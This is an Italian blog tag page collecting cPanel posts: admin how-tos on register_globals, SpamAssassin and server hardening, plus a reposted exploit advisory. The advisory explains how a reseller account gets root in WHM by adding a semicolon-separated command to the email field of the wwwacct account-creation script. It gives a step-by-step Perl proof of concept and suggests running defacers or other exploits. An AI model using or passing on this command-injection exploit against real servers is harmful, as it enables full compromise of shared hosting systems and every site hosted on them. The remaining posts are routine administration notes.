Post con tag cpanel

cPanel bug: Accesso root tramite account reseller

20 mag

Pubblicato da morphey in Linux | 482 views

E’ appena uscito un bug per il WHM di cPanel: tale bug permette ad un attaccante di avere accesso root tramite un semplice account rivenditore.

Ecco la descrizione (in inglese) dell’exploit:

By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir
Vendor : Cpanel.net
Version : ALL !!
Risk : Very high
What u can do with this bug is :
u can have a access to all the server with reseller privilege (Th3 r00t)
how it’s work ?
when u want to create an account in shell what will happen ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
that u can run it with a web base program ! ( cpanel : doamin:2086)
example :
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
it means you got a access to wwwacct in the scripts folder (Th3 r00t)
so u can run other command with root access like that
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
that u can Likewise run it on the web base program.what u need to do is just write ali@hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1

Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old=’/home/user/public_html/test.txt’;
$new=’/home/root/kon.txt’;
rename $old, $new;
++++++++++++++++++++++++++
step 2

make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3

create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the “create” button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit’s or everything that u want).

Popularity: 6% [?]

(No Ratings Yet)

Loading ...

bug, cpanel, resellers

cPanel: register_globals sul singolo virtualhost con apache 2.x e mod_suphp

20 mar

Pubblicato da morphey in Howto | 786 views

1 commento

Vediamo come modificare un solo virtualhost senza perdere le modifiche alla rigenerazione dell’httpd.conf di apache.

Se non esiste, creiamo la cartella /usr/local/apache/conf/userdata/std/2/UTENTE/DOMINIO.EST/
Possiamo sostituire “std” con “ssl” se vogliamo modificare il virtualhost “solo” per l’ssl.
Se usiamo apache 1.x dobbiamo cambiare il “2” con “1“.

Creiamo un file di nome user.conf (o di qualsiasi altro nome, l’importante è che risulta l’estensione .conf).

In questo file mettiamo le direttive specifiche per questo dominio in modo che prende le variabili personalizzate del php.ini da un altro file.

Nell’esempio, vogliamo attivare il register_globals solo per questo dominio.
Il mod_suphp permette di personalizzare questo path con la direttiva “suPHP_ConfigPath“:

### /usr/local/apache/conf/userdata/std/2/UTENTE/DOMINIO.EST/user.conf

<IfModule mod_suphp.c>
suPHP_ConfigPath /usr/local/Zend/register-enabled
</IfModule>

In questo modo, riavviando apache (non lo facciamo ora pero’), il virtualhost andra’ a cercare il php.ini dentro la directory /usr/local/Zend/register-enabled creata ad hoc:

mkdir -p /usr/local/Zend/register-enabled
touch /usr/local/Zend/register-enabled/php.ini

Nel file /usr/local/Zend/register-enabled/php.ini metteremo, quindi, la direttiva per l’attivazione di register_globals:

## /usr/local/Zend/register-enabled/php.ini
register_globals = On

Prima di riavviare apache, dobbiamo istruirlo per far includere i files appena creati.
Per fare questo lanciamo il seguente comando:

/scripts/ensure_vhost_includes –user=UTENTE

Al termine, possiamo riavviare apache e il lavoro e’ finito.

Per curiosita’ e verifica, possiamo editare /usr/local/apache/conf/httpd.conf e vedere nel virtualhost del dominio se effettivamente le modifiche hanno avuto effetto.
Possiamo notare:

Include “/usr/local/apache/conf/userdata/*.conf”
Include “/usr/local/apache/conf/userdata/*.owner-root”
Include “/usr/local/apache/conf/userdata/std/*.conf”
Include “/usr/local/apache/conf/userdata/std/*.owner-root”
Include “/usr/local/apache/conf/userdata/std/2/*.conf”
Include “/usr/local/apache/conf/userdata/std/2/*.owner-root”
Include “/usr/local/apache/conf/userdata/std/2/UTENTE/*.conf”
Include “/usr/local/apache/conf/userdata/std/2/UTENTE/DOMINIO.EST/*.conf”

Popularity: 10% [?]

(No Ratings Yet)

Loading ...

apache, configpath, cpanel, httpd.conf, includes, mod_suphp, php.ini, register_globals, scripts, ssl, std, suphp, suPHP_ConfigPath, user.conf, userdate, vhost, virtualhost

cPanel: Abilitare spamassassin a tutti gli utenti

15 gen

Pubblicato da morphey in Howto | 466 views

1 commento

Nel WHM di cPanel manca qualcosa molto utile per gli admin del server.

Stiamo parlando dell’abilitazione di Spamassassin per tutti gli account in un solo colpo.

E’ vero che abbiamo nella sezione “Exim configuration editor” la possibilità di flaggare “SpamAssassin: Enable for all users without the option for users to shut off per account”: questo fa si che venga abilitato spamassassin su tutti gli account, ma è anche vero che disabilita di fatto il pulsante “Disable spamassassin” nel singolo cPanel dell’utente impedendo a quest’ultimo di scegliere se abilitarlo o meno.

Spizzando il forum di cPanel ho trovato un post molto interessante che ho testato personalmente.

Creiamo su /root/ il file enabless.sh con questo contenuto:

#! /bin/sh
M_FILENAME=$1
#echo $M_FILENAME
M_USERNAME=`find $M_FILENAME -printf %f`
#echo $M_USERNAME

touch /home/$M_USERNAME/.spamassassinenable
chown $M_USERNAME.$M_USERNAME /home/$M_USERNAME/.spamassassinenable
touch /home/$M_USERNAME/.spamassassinboxenable
chown $M_USERNAME.$M_USERNAME /home/$M_USERNAME/.spamassassinboxenable

echo $M_USERNAME complete
echo

Impostiamo il chmod del file a 700.

Lanciamo questo comando:

find /var/cpanel/users -type f -exec /root/enabless.sh {} \;

Questo creerà per ogni account utenti i files .spamassassinenable e .spamassassinboxenable ciò che serve per abilitare automaticamente spamassassin.

Popularity: 9% [?]

(No Ratings Yet)

Loading ...

account, accounts, chmod, configuration, configurazione, cpanel, editor, enable, exim, forum, post, server, spamassassin, WHM

Sicurezza: rendere sicuro un server linux (compatibile con cPanel e DirectAdmin)

10 gen

Pubblicato da morphey in Linux | 890 views

1 commento

ServerMonkeys Volevo segnalare questo fantastico script, che installa in automatico tutte le versioni più recenti dei sistemi di Firewall, Antiflood e altro ancora.

Dal sito di Server Monkeys :

Install RKHunter
Install RKHunter Cronjob which emails a user-set email address nightly
Install/update APF
Add SM/TP monitoring IPs (view information on these in Orbit)
Install/update BFD
Install CHKROOTKIT
Install CHKROOTKIT Cronjob which emails a user-set email address nightly
Disable Telnet
Force SSH Protocol 2
Secure /tmp
Secure /var/tmp
Secure /dev/shm
Install/update Zend Optimizer
Install/update eAccelerator
MySQL 4.0 and 4.1 Configuration Optimization (cPanel only)
Upgrade MySQL to 4.1 (cPanel only)
Tweak WHM Settings for security and stability
Configure RNDC if not already done (cPanel only)
Change SSH port (also configure APF as necessary)
Add wheel user and disable direct root login over SSH
Optimize MySQL tables
Install/update Libsafe
Install/update ImageMagick (from latest source)
Uninstall LAuS
Harden sysctl.conf
Install Chirpy’s Free Exim Dictionary Attack ACL
And more!

Tutto questo compatibile con:

Continua >

Popularity: 8% [?]

(No Ratings Yet)

Loading ...

centos, cpanel, directadmin, fedora, firewall, redhat, security, servermonkeys, sicurezza

Spamassassin: soluzione al problema di overload

9 gen

Pubblicato da morphey in Linux | 450 views

1 commento

Ultimamente gli sviluppatori di Spamassassin non stanno più sviluppando il software antispam.

Chi ha attive le quote sulla macchina linux (parlo per gli utenti di cPanel) ha potuto constatare che per un bug di spamassassin ancora non corretto, se un utente ha lo spazio sul proprio account esaurito, spamassassin va in overload facendo piantare di fatto la macchina.

Tutto questo perchè, a quota esaurita, se un utente riceve ancora email (che chiaramente vengono inviate indietro con il messaggio “Mailbox is full”) il file .spamassassin presente nel suo account rimane letteralmente bloccato facendo freezare di fatto il processo di spamd associato portando inesorabilmente il load della macchina a livelli molto alti compromettendone la stabilità e gli altri servizi.

Per risolvere il problema gli sviluppatori di cPanel hanno fatto loro stessi una patch che sembra risolvere a metà il problema.

La soluzione più ovvia è quella di patchare spamd come dicono loro.

Prima di tutto eliminiamo tutti i files .spamassassin (non preoccupatevi, sono files temporanei di spamd per ogni utente) in modo da liberare spazio su tutti gli account:

find /home -name .spamassassin | xargs rm -rf

L’operazione può richiedere alcuni minuti.
Infine patchamo spamd e lo riavviamo in questo modo:

/scripts/autorepair spamd_dbm_fix
/scripts/restartsrv_exim

Popularity: 6% [?]

(No Ratings Yet)

Loading ...

bug, cpanel, exim, Linux, overload, patch, spam, spamassassin, spamd

Categorie
- Automobili (1)
- cPanel (14)
- Dr. House (11)
- Generale (23)
- Google (3)
- Hacking (3)
- Howto (14)
- Informatica (27)
- Javascript (4)
- Linux (43)
- Mobile (1)
- Mondo (1)
- Musica e radio (3)
- PHP (2)
- Plesk (3)
- Politica (25)
- Programmazione (3)
- Provider (2)
- Reti (2)
- RSS dal web (39)
- Segnalazioni (24)
- Sistemistica (10)
- Sport (2)
- Teatro (1)
- telefonia (1)
- Televisione (1)
- Viaggi (2)
- Windows (3)
Blogroll
Ansa News
- Usa: sfiorata nuova marea nera 03/09/2010
  Esplode altra piattaforma nel Golfo, ne' vittime ne' perdite […]
- Mo: estremisti minacciano Israele 03/09/2010
  13 gruppi ostili ad accordi di pace, 'colpiremo ovunque' […]
- Usa: piattaforma, greggio in mare 02/09/2010
  Non chiaro se provocata da esplosione o da perdita precedente […]
- Superenalotto: nessun 6, ne' 5+ 02/09/2010
  Combinazione: 18, 30, 40, 64, 88, 89, jolly 69, Superstar 79 […]
- Incidenti stradali: morti due bimbi 02/09/2010
  Scontri mortali nel grossetano e nel viterbese […]
- Morto operaio in betoniera nel Torinese 02/09/2010
  Era rimasto incastrato e aveva perso una gamba, aveva 57 anni […]
- Usa:piattaforma esplosa,non c'e' perdita 02/09/2010
  Azienda proprietaria della base, non c'e' neanche nessun ferito […]
- Casini: nuova legge elettorale possibile 02/09/2010
  Leader dell'Udc auspica un sistema proporzionale alla tedesca […]

Commenti recenti
- morphey: si si è bellissimo, ci sono stato diverse volte…ora voglio donare anche alla mia girl questa...
- M0rF3uS: Non ci sono mai stato ma la mia ragazza ci è andata da piccola, dice che è un esperienza che ti rimane in...
- morphey: beato a te :°°° io se riesco voglio portare la raga mia la settimana delle ferie di agosto a Eurodisney a...
- M0rF3uS: Bella brancaleone vero? io sto a reggio calabria ma mi muovo in continuazione verso scilla sul tirreno...
- morphey: ahahah sono stato tra Peschici e Vieste, in un residence a metà strada….bella la calabria, io sono...
Articoli più letti
Tag
aggregatore america anno apache auguri beppe blog canale5 censura centos cpanel division dr house exim flash fox governo grillo house Howto immagini italia javascript ladri legge levi Linux mafia mastella md medical morire morphey nuovo php php.ini Politica prodi roma rss spam stato tuxfeed virtualhost wordpress

Post con tag cpanel

cPanel bug: Accesso root tramite account reseller

cPanel: register_globals sul singolo virtualhost con apache 2.x e mod_suphp

cPanel: Abilitare spamassassin a tutti gli utenti

Sicurezza: rendere sicuro un server linux (compatibile con cPanel e DirectAdmin)

Spamassassin: soluzione al problema di overload

Categorie

Blogroll

Ansa News

Commenti recenti

Articoli più letti

Tag